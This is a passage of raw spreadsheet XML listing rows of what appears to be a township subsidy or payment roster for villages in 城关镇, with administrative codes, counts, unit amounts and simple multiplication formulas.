      <c r="B278" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C278" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D278" s="14" t="s">
        <v>905</v>
      </c>
      <c r="E278" s="14" t="s">
        <v>679</v>
      </c>
      <c r="F278" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G278" s="14">
        <v>1</v>
      </c>
      <c r="H278" s="14">
        <v>340</v>
      </c>
      <c r="I278" s="14">
        <f t="shared" si="9"/>
        <v>340</v>
      </c>
      <c r="J278" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K278" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="279" ht="23" customHeight="1" spans="1:11">
      <c r="A279" s="13" t="s">
        <v>906</v>
      </c>
      <c r="B279" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C279" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D279" s="14" t="s">
        <v>907</v>
      </c>
      <c r="E279" s="14" t="s">
        <v>527</v>
      </c>
      <c r="F279" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G279" s="14">
        <v>1</v>
      </c>
      <c r="H279" s="14">
        <v>340</v>
      </c>
      <c r="I279" s="14">
        <f t="shared" si="9"/>
        <v>340</v>
      </c>
      <c r="J279" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K279" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="280" ht="23" customHeight="1" spans="1:11">
      <c r="A280" s="13" t="s">
        <v>908</v>
      </c>
      <c r="B280" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C280" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D280" s="14" t="s">
        <v>909</v>
      </c>
      <c r="E280" s="14" t="s">
        <v>306</v>
      </c>
      <c r="F280" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G280" s="14">
        <v>2</v>
      </c>
      <c r="H280" s="14">
        <v>300</v>
      </c>
      <c r="I280" s="14">
        <f t="shared" si="9"/>
        <v>600</v>
      </c>
      <c r="J280" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K280" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="281" ht="23" customHeight="1" spans="1:11">
      <c r="A281" s="13" t="s">
        <v>910</v>
      </c>
      <c r="B281" s="14" t="str">
        <f>B280</f>
        <v>城关镇</v>
      </c>
      <c r="C281" s="14" t="str">
        <f>C280</f>
        <v>西北村</v>
      </c>
      <c r="D281" s="13" t="s">
        <v>911</v>
      </c>
      <c r="E281" s="13" t="s">
        <v>239</v>
      </c>
      <c r="F281" s="14" t="str">
        <f>F280</f>
        <v>4113210106</v>
      </c>
      <c r="G281" s="14"/>
      <c r="H281" s="14"/>
      <c r="I281" s="14"/>
      <c r="J281" s="14"/>
      <c r="K281" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="282" ht="23" customHeight="1" spans="1:11">
      <c r="A282" s="13" t="s">
        <v>912</v>
      </c>
      <c r="B282" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C282" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D282" s="14" t="s">
        <v>913</v>
      </c>
      <c r="E282" s="14" t="s">
        <v>232</v>
      </c>
      <c r="F282" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G282" s="14">
        <v>2</v>
      </c>
      <c r="H282" s="14">
        <v>300</v>
      </c>
      <c r="I282" s="14">
        <f>H282*G282</f>
        <v>600</v>
      </c>
      <c r="J282" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K282" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="283" ht="23" customHeight="1" spans="1:11">
      <c r="A283" s="13" t="s">
        <v>914</v>
      </c>
      <c r="B283" s="14" t="str">
        <f>B282</f>
        <v>城关镇</v>
      </c>
      <c r="C283" s="14" t="str">
        <f>C282</f>
        <v>北外村</v>
      </c>
      <c r="D283" s="13" t="s">
        <v>915</v>
      </c>
      <c r="E283" s="13" t="s">
        <v>916</v>
      </c>
      <c r="F283" s="14" t="str">
        <f>F282</f>
        <v>4113210102</v>
      </c>
      <c r="G283" s="14"/>
      <c r="H283" s="14"/>
      <c r="I283" s="14"/>
      <c r="J283" s="14"/>
      <c r="K283" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="284" ht="23" customHeight="1" spans="1:11">
      <c r="A284" s="13" t="s">
        <v>917</v>
      </c>
      <c r="B284" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C284" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D284" s="14" t="s">
        <v>918</v>
      </c>
      <c r="E284" s="14" t="s">
        <v>880</v>
      </c>
      <c r="F284" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G284" s="14">
        <v>1</v>
      </c>
      <c r="H284" s="14">
        <v>340</v>
      </c>
      <c r="I284" s="14">
        <f>H284*G284</f>
        <v>340</v>
      </c>
      <c r="J284" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K284" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="285" ht="23" customHeight="1" spans="1:11">
      <c r="A285" s="13" t="s">
        <v>919</v>
      </c>
      <c r="B285" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C285" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D285" s="14" t="s">
        <v>920</v>
      </c>
      <c r="E285" s="14" t="s">
        <v>400</v>
      </c>
      <c r="F285" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G285" s="14">
        <v>1</v>
      </c>
      <c r="H285" s="14">
        <v>340</v>
      </c>
      <c r="I285" s="14">
        <f>H285*G285</f>
        <v>340</v>
      </c>
      <c r="J285" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K285" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="286" ht="23" customHeight="1" spans="1:11">
      <c r="A286" s="13" t="s">
        <v>921</v>
      </c>
      <c r="B286" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C286" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D286" s="14" t="s">
        <v>922</v>
      </c>
      <c r="E286" s="14" t="s">
        <v>592</v>
      </c>
      <c r="F286" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G286" s="14">
        <v>1</v>
      </c>
      <c r="H286" s="14">
        <v>340</v>
      </c>
      <c r="I286" s="14">
        <f>H286*G286</f>
        <v>340</v>
      </c>
      <c r="J286" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K286" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="287" ht="23" customHeight="1" spans="1:11">
      <c r="A287" s="13" t="s">
        <v>923</v>
      </c>
      <c r="B287" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C287" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D287" s="14" t="s">
        <v>924</v>
      </c>
      <c r="E287" s="14" t="s">
        <v>273</v>
      </c>
      <c r="F287" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G287" s="14">
        <v>2</v>
      </c>
      <c r="H287" s="14">
        <v>300</v>
      </c>
      <c r="I287" s="14">
        <f>H287*G287</f>
        <v>600</v>
      </c>
      <c r="J287" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K287" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="288" ht="23" customHeight="1" spans="1:11">
      <c r="A288" s="13" t="s">
        <v>925</v>
      </c>
      <c r="B288" s="14" t="str">
        <f>B287</f>
        <v>城关镇</v>
      </c>
      <c r="C288" s="14" t="str">
        <f>C287</f>
        <v>中华村</v>
      </c>
      <c r="D288" s="13" t="s">
        <v>926</v>
      </c>
      <c r="E288" s="13" t="s">
        <v>258</v>
      </c>
      <c r="F288" s="14" t="str">
        <f>F287</f>
        <v>4113210108</v>
      </c>
      <c r="G288" s="14"/>
      <c r="H288" s="14"/>
      <c r="I288" s="14"/>
      <c r="J288" s="14"/>
      <c r="K288" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="289" ht="23" customHeight="1" spans="1:11">
      <c r="A289" s="13" t="s">
        <v>927</v>
      </c>
      <c r="B289" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C289" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D289" s="14" t="s">
        <v>928</v>
      </c>
      <c r="E289" s="14" t="s">
        <v>292</v>
      </c>
      <c r="F289" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G289" s="14">
        <v>1</v>
      </c>
      <c r="H289" s="14">
        <v>340</v>
      </c>
      <c r="I289" s="14">
        <f t="shared" ref="I289:I295" si="10">H289*G289</f>
        <v>340</v>
      </c>
      <c r="J289" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K289" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="290" ht="23" customHeight="1" spans="1:11">
      <c r="A290" s="13" t="s">
        <v>929</v>
      </c>
      <c r="B290" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C290" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D290" s="14" t="s">
        <v>930</v>
      </c>
      <c r="E290" s="14" t="s">
        <v>269</v>
      </c>
      <c r="F290" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G290" s="14">
        <v>1</v>
      </c>
      <c r="H290" s="14">
        <v>340</v>
      </c>
      <c r="I290" s="14">
        <f t="shared" si="10"/>
        <v>340</v>
      </c>
      <c r="J290" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K290" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="291" ht="23" customHeight="1" spans="1:11">
      <c r="A291" s="13" t="s">
        <v>931</v>
      </c>
      <c r="B291" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C291" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D291" s="14" t="s">
        <v>932</v>
      </c>
      <c r="E291" s="14" t="s">
        <v>933</v>
      </c>
      <c r="F291" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G291" s="14">
        <v>1</v>
      </c>
      <c r="H291" s="14">
        <v>340</v>
      </c>
      <c r="I291" s="14">
        <f t="shared" si="10"/>
        <v>340</v>
      </c>
      <c r="J291" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K291" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="292" ht="23" customHeight="1" spans="1:11">
      <c r="A292" s="13" t="s">
        <v>934</v>
      </c>
      <c r="B292" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C292" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D292" s="14" t="s">
        <v>935</v>
      </c>
      <c r="E292" s="14" t="s">
        <v>249</v>
      </c>
      <c r="F292" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G292" s="14">
        <v>1</v>
      </c>
      <c r="H292" s="14">
        <v>340</v>
      </c>
      <c r="I292" s="14">
        <f t="shared" si="10"/>
        <v>340</v>
      </c>
      <c r="J292" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K292" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="293" ht="23" customHeight="1" spans="1:11">
      <c r="A293" s="13" t="s">
        <v>936</v>
      </c>
      <c r="B293" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C293" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D293" s="14" t="s">
        <v>937</v>
      </c>
      <c r="E293" s="14" t="s">
        <v>239</v>
      </c>
      <c r="F293" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G293" s="14">
        <v>1</v>
      </c>
      <c r="H293" s="14">
        <v>450</v>
      </c>
      <c r="I293" s="14">
        <f t="shared" si="10"/>
        <v>450</v>
      </c>
      <c r="J293" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K293" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="294" ht="23" customHeight="1" spans="1:11">
      <c r="A294" s="13" t="s">
        <v>938</v>
      </c>
      <c r="B294" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C294" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D294" s="14" t="s">
        <v>939</v>
      </c>
      <c r="E294" s="14" t="s">
        <v>340</v>
      </c>
      <c r="F294" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G294" s="14">
        <v>1</v>
      </c>
      <c r="H294" s="14">
        <v>340</v>
      </c>
      <c r="I294" s="14">
        <f t="shared" si="10"/>
        <v>340</v>
      </c>
      <c r="J294" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K294" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="295" ht="23" customHeight="1" spans="1:11">
      <c r="A295" s="13" t="s">
        <v>940</v>
      </c>
      <c r="B295" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C295" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D295" s="14" t="s">
        <v>941</v>
      </c>
      <c r="E295" s="14" t="s">
        <v>767</v>
      </c>
      <c r="F295" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G295" s="14">
        <v>2</v>
      </c>
      <c r="H295" s="14">
        <v>300</v>
      </c>
      <c r="I295" s="14">
        <f t="shared" si="10"/>
        <v>600</v>
      </c>
      <c r="J295" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K295" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="296" ht="23" customHeight="1" spans="1:11">
      <c r="A296" s="13" t="s">
        <v>942</v>
      </c>
      <c r="B296" s="14" t="str">
        <f>B295</f>
        <v>城关镇</v>
      </c>
      <c r="C296" s="14" t="str">
        <f>C295</f>
        <v>中华村</v>
      </c>
      <c r="D296" s="13" t="s">
        <v>943</v>
      </c>
      <c r="E296" s="13" t="s">
        <v>933</v>
      </c>
      <c r="F296" s="14" t="str">
        <f>F295</f>
        <v>4113210108</v>
      </c>
      <c r="G296" s="14"/>
      <c r="H296" s="14"/>
      <c r="I296" s="14"/>
      <c r="J296" s="14"/>
      <c r="K296" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="297" ht="23" customHeight="1" spans="1:11">
      <c r="A297" s="13" t="s">
        <v>944</v>
      </c>
      <c r="B297" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C297" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D297" s="14" t="s">
        <v>945</v>
      </c>
      <c r="E297" s="14" t="s">
        <v>779</v>
      </c>
      <c r="F297" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G297" s="14">
        <v>1</v>
      </c>
      <c r="H297" s="14">
        <v>340</v>
      </c>
      <c r="I297" s="14">
        <f>H297*G297</f>
        <v>340</v>
      </c>
      <c r="J297" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K297" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="298" ht="23" customHeight="1" spans="1:11">
      <c r="A298" s="13" t="s">
        <v>946</v>
      </c>
      <c r="B298" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C298" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D298" s="14" t="s">
        <v>947</v>
      </c>
      <c r="E298" s="14" t="s">
        <v>306</v>
      </c>
      <c r="F298" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G298" s="14">
        <v>2</v>
      </c>
      <c r="H298" s="14">
        <v>300</v>
      </c>
      <c r="I298" s="14">
        <f>H298*G298</f>
        <v>600</v>
      </c>
      <c r="J298" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K298" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="299" ht="23" customHeight="1" spans="1:11">
      <c r="A299" s="13" t="s">
        <v>948</v>
      </c>
      <c r="B299" s="14" t="str">
        <f>B298</f>
        <v>城关镇</v>
      </c>
      <c r="C299" s="14" t="str">
        <f>C298</f>
        <v>西北村</v>
      </c>
      <c r="D299" s="13" t="s">
        <v>949</v>
      </c>
      <c r="E299" s="13" t="s">
        <v>320</v>
      </c>
      <c r="F299" s="14" t="str">
        <f>F298</f>
        <v>4113210106</v>
      </c>
      <c r="G299" s="14"/>
      <c r="H299" s="14"/>
      <c r="I299" s="14"/>
      <c r="J299" s="14"/>
      <c r="K299" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="300" ht="23" customHeight="1" spans="1:11">
      <c r="A300" s="13" t="s">
        <v>950</v>
      </c>
      <c r="B300" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C300" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D300" s="14" t="s">
        <v>951</v>
      </c>
      <c r="E300" s="14" t="s">
        <v>709</v>
      </c>
      <c r="F300" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G300" s="14">
        <v>2</v>
      </c>
      <c r="H300" s="14">
        <v>300</v>
      </c>
      <c r="I300" s="14">
        <f>H300*G300</f>
        <v>600</v>
      </c>
      <c r="J300" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K300" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="301" ht="23" customHeight="1" spans="1:11">
      <c r="A301" s="13" t="s">
        <v>952</v>
      </c>
      <c r="B301" s="14" t="str">
        <f>B300</f>
        <v>城关镇</v>
      </c>
      <c r="C301" s="14" t="str">
        <f>C300</f>
        <v>西北村</v>
      </c>
      <c r="D301" s="13" t="s">
        <v>953</v>
      </c>
      <c r="E301" s="13" t="s">
        <v>779</v>
      </c>
      <c r="F301" s="14" t="str">
        <f>F300</f>
        <v>4113210106</v>
      </c>
      <c r="G301" s="14"/>
      <c r="H301" s="14"/>
      <c r="I301" s="14"/>
      <c r="J301" s="14"/>
      <c r="K301" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="302" ht="23" customHeight="1" spans="1:11">
      <c r="A302" s="13" t="s">
        <v>954</v>
      </c>
      <c r="B302" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C302" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D302" s="14" t="s">
        <v>955</v>
      </c>
      <c r="E302" s="14" t="s">
        <v>239</v>
      </c>
      <c r="F302" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G302" s="14">
        <v>1</v>
      </c>
      <c r="H302" s="14">
        <v>340</v>
      </c>
      <c r="I302" s="14">
        <f t="shared" ref="I302:I307" si="11">H302*G302</f>
        <v>340</v>
      </c>
      <c r="J302" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K302" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="303" ht="23" customHeight="1" spans="1:11">
      <c r="A303" s="13" t="s">
        <v>956</v>
      </c>
      <c r="B303" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C303" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D303" s="14" t="s">
        <v>278</v>
      </c>
      <c r="E303" s="14" t="s">
        <v>957</v>
      </c>
      <c r="F303" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G303" s="14">
        <v>1</v>
      </c>
      <c r="H303" s="14">
        <v>340</v>
      </c>
      <c r="I303" s="14">
        <f t="shared" si="11"/>
        <v>340</v>
      </c>
      <c r="J303" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K303" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="304" ht="23" customHeight="1" spans="1:11">
      <c r="A304" s="13" t="s">
        <v>958</v>
      </c>
      <c r="B304" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C304" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D304" s="14" t="s">
        <v>959</v>
      </c>
      <c r="E304" s="14" t="s">
        <v>960</v>
      </c>
      <c r="F304" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G304" s="14">
        <v>1</v>
      </c>
      <c r="H304" s="14">
        <v>340</v>
      </c>
      <c r="I304" s="14">
        <f t="shared" si="11"/>
        <v>340</v>
      </c>
      <c r="J304" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K304" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="305" ht="23" customHeight="1" spans="1:11">
      <c r="A305" s="13" t="s">
        <v>961</v>
      </c>
      <c r="B305" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C305" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D305" s="14" t="s">
        <v>962</v>
      </c>
      <c r="E305" s="14" t="s">
        <v>265</v>
      </c>
      <c r="F305" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G305" s="14">
        <v>1</v>
      </c>
      <c r="H305" s="14">
        <v>340</v>
      </c>
      <c r="I305" s="14">
        <f t="shared" si="11"/>
        <v>340</v>
      </c>
      <c r="J305" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K305" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="306" ht="23" customHeight="1" spans="1:11">
      <c r="A306" s="13" t="s">
        <v>963</v>
      </c>
      <c r="B306" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C306" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D306" s="14" t="s">
        <v>964</v>
      </c>
      <c r="E306" s="14" t="s">
        <v>435</v>
      </c>
      <c r="F306" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G306" s="14">
        <v>1</v>
      </c>
      <c r="H306" s="14">
        <v>340</v>
      </c>
      <c r="I306" s="14">
        <f t="shared" si="11"/>
        <v>340</v>
      </c>
      <c r="J306" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K306" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="307" ht="23" customHeight="1" spans="1:11">
      <c r="A307" s="13" t="s">
        <v>965</v>
      </c>
      <c r="B307" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C307" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D307" s="14" t="s">
        <v>966</v>
      </c>
      <c r="E307" s="14" t="s">
        <v>239</v>
      </c>
      <c r="F307" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G307" s="14">
        <v>2</v>
      </c>
      <c r="H307" s="14">
        <v>300</v>
      </c>
      <c r="I307" s="14">
        <f t="shared" si="11"/>
        <v>600</v>
      </c>
      <c r="J307" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K307" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="308" ht="23" customHeight="1" spans="1:11">
      <c r="A308" s="13" t="s">
        <v>967</v>
      </c>
      <c r="B308" s="14" t="str">
        <f>B307</f>
        <v>城关镇</v>
      </c>
      <c r="C308" s="14" t="str">
        <f>C307</f>
        <v>北外村</v>
      </c>
      <c r="D308" s="13" t="s">
        <v>968</v>
      </c>
      <c r="E308" s="13" t="s">
        <v>969</v>
      </c>
      <c r="F308" s="14" t="str">
        <f>F307</f>
        <v>4113210102</v>
      </c>
      <c r="G308" s="14"/>
      <c r="H308" s="14"/>
      <c r="I308" s="14"/>
      <c r="J308" s="14"/>
      <c r="K308" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="309" ht="23" customHeight="1" spans="1:11">
      <c r="A309" s="13" t="s">
        <v>970</v>
      </c>
      <c r="B309" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C309" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D309" s="14" t="s">
        <v>971</v>
      </c>
      <c r="E309" s="14" t="s">
        <v>972</v>
      </c>
      <c r="F309" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G309" s="14">
        <v>3</v>
      </c>
      <c r="H309" s="14">
        <v>265</v>
      </c>
      <c r="I309" s="14">
        <f>H309*G309</f>
        <v>795</v>
      </c>
      <c r="J309" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K309" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="310" ht="23" customHeight="1" spans="1:11">
      <c r="A310" s="13" t="s">
        <v>973</v>
      </c>
      <c r="B310" s="14" t="str">
        <f>B309</f>
        <v>城关镇</v>
      </c>
      <c r="C310" s="14" t="str">
        <f>C309</f>
        <v>中华村</v>
      </c>
      <c r="D310" s="13" t="s">
        <v>974</v>
      </c>
      <c r="E310" s="13" t="s">
        <v>975</v>
      </c>
      <c r="F310" s="14" t="str">
        <f>F309</f>
        <v>4113210108</v>
      </c>
      <c r="G310" s="14"/>
      <c r="H310" s="14"/>
      <c r="I310" s="14"/>
      <c r="J310" s="14"/>
      <c r="K310" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="311" ht="23" customHeight="1" spans="1:11">
      <c r="A311" s="13" t="s">
        <v>976</v>
      </c>
      <c r="B311" s="14" t="str">
        <f>B310</f>
        <v>城关镇</v>
      </c>
      <c r="C311" s="14" t="str">
        <f>C310</f>
        <v>中华村</v>
      </c>
      <c r="D311" s="13" t="s">
        <v>977</v>
      </c>
      <c r="E311" s="13" t="s">
        <v>978</v>
      </c>
      <c r="F311" s="14" t="str">
        <f>F310</f>
        <v>4113210108</v>
      </c>
      <c r="G311" s="14"/>
      <c r="H311" s="14"/>
      <c r="I311" s="14"/>
      <c r="J311" s="14"/>
      <c r="K311" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="312" ht="23" customHeight="1" spans="1:11">
      <c r="A312" s="13" t="s">
        <v>979</v>
      </c>
      <c r="B312" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C312" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D312" s="14" t="s">
        <v>980</v>
      </c>
      <c r="E312" s="14" t="s">
        <v>502</v>
      </c>
      <c r="F312" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G312" s="14">
        <v>1</v>
      </c>
      <c r="H312" s="14">
        <v>340</v>
      </c>
      <c r="I312" s="14">
        <f>H312*G312</f>
        <v>340</v>
      </c>
      <c r="J312" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K312" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="313" ht="23" customHeight="1" spans="1:11">
      <c r="A313" s="13" t="s">
        <v>981</v>
      </c>
      <c r="B313" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C313" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D313" s="14" t="s">
        <v>982</v>
      </c>
      <c r="E313" s="14" t="s">
        <v>983</v>
      </c>
      <c r="F313" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G313" s="14">
        <v>1</v>
      </c>
      <c r="H313" s="14">
        <v>340</v>
      </c>
      <c r="I313" s="14">
        <f>H313*G313</f>
        <v>340</v>
      </c>
      <c r="J313" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K313" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="314" ht="23" customHeight="1" spans="1:11">
      <c r="A314" s="13" t="s">
        <v>984</v>
      </c>
      <c r="B314" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C314" s="14" t="s">
        <v>318</v>
      </c>
      <c r="D314" s="14" t="s">
        <v>985</v>
      </c>
      <c r="E314" s="14" t="s">
        <v>986</v>
      </c>
      <c r="F314" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G314" s="14">
        <v>2</v>
      </c>
      <c r="H314" s="14">
        <v>300</v>
      </c>
      <c r="I314" s="14">
        <f>H314*G314</f>
        <v>600</v>
      </c>
      <c r="J314" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K314" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="315" ht="23" customHeight="1" spans="1:11">
      <c r="A315" s="13" t="s">
        <v>987</v>
      </c>
      <c r="B315" s="14" t="str">
        <f>B314</f>
        <v>城关镇</v>
      </c>
      <c r="C315" s="14" t="str">
        <f>C314</f>
        <v>东北一组</v>
      </c>
      <c r="D315" s="13" t="s">
        <v>988</v>
      </c>
      <c r="E315" s="13" t="s">
        <v>405</v>
      </c>
      <c r="F315" s="14" t="str">
        <f>F314</f>
        <v>4113210103</v>
      </c>
      <c r="G315" s="14"/>
      <c r="H315" s="14"/>
      <c r="I315" s="14"/>
      <c r="J315" s="14"/>
      <c r="K315" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="316" ht="23" customHeight="1" spans="1:11">
      <c r="A316" s="13" t="s">
        <v>989</v>
      </c>
      <c r="B316" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C316" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D316" s="14" t="s">
        <v>990</v>
      </c>
      <c r="E316" s="14" t="s">
        <v>972</v>
      </c>
      <c r="F316" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G316" s="14">
        <v>1</v>
      </c>
      <c r="H316" s="14">
        <v>340</v>
      </c>
      <c r="I316" s="14">
        <f>H316*G316</f>
        <v>340</v>
      </c>
      <c r="J316" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K316" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="317" ht="23" customHeight="1" spans="1:11">
      <c r="A317" s="13" t="s">
        <v>991</v>
      </c>
      <c r="B317" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C317" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D317" s="14" t="s">
        <v>992</v>
      </c>
      <c r="E317" s="14" t="s">
        <v>346</v>
      </c>
      <c r="F317" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G317" s="14">
        <v>2</v>
      </c>
      <c r="H317" s="14">
        <v>300</v>
      </c>
      <c r="I317" s="14">
        <f>H317*G317</f>
        <v>600</v>
      </c>
      <c r="J317" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K317" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="318" ht="23" customHeight="1" spans="1:11">
      <c r="A318" s="13" t="s">
        <v>993</v>
      </c>
      <c r="B318" s="14" t="str">
        <f>B317</f>
        <v>城关镇</v>
      </c>
      <c r="C318" s="14" t="str">
        <f>C317</f>
        <v>西北村</v>
      </c>
      <c r="D318" s="13" t="s">
        <v>994</v>
      </c>
      <c r="E318" s="13" t="s">
        <v>373</v>
      </c>
      <c r="F318" s="14" t="str">
        <f>F317</f>
        <v>4113210106</v>
      </c>
      <c r="G318" s="14"/>
      <c r="H318" s="14"/>
      <c r="I318" s="14"/>
